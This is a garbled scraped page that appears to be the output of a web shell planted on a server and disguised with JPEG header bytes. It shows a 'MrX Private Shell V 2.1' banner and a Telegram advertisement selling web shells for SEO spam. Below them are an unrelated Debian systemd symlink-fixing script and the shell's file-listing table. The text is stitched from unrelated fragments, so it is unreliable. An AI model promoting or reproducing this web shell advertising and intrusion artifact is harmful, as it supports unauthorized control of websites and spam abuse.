����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
Log "Fixup debian jessie systemd files"
# on debian jessie systemd files are located in /lib/systemd not
# /usr/lib/systemd, as such symlink then within the $ROOTFS_DIR
# otherwise certain services won't come up.
if [ -e "$ROOTFS_DIR/lib/systemd/" ]; then
cd $ROOTFS_DIR/lib/systemd/
my_systemd_files=( $( ls -1 systemd-* ))
if [ -e "$ROOTFS_DIR/usr/lib/systemd/" ]; then
cd $ROOTFS_DIR/usr/lib/systemd/
for m in "${my_systemd_files[@]}" ; do
ln -sf ../../../lib/systemd/$m $m
done
else
Error "Missing usr/lib/systemd/system - too confused to continue"
fi
fi
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| i386 | Folder | 0755 |
|
|
| 610_jessie_link_systemd_lib.sh | File | 625 B | 0644 |
|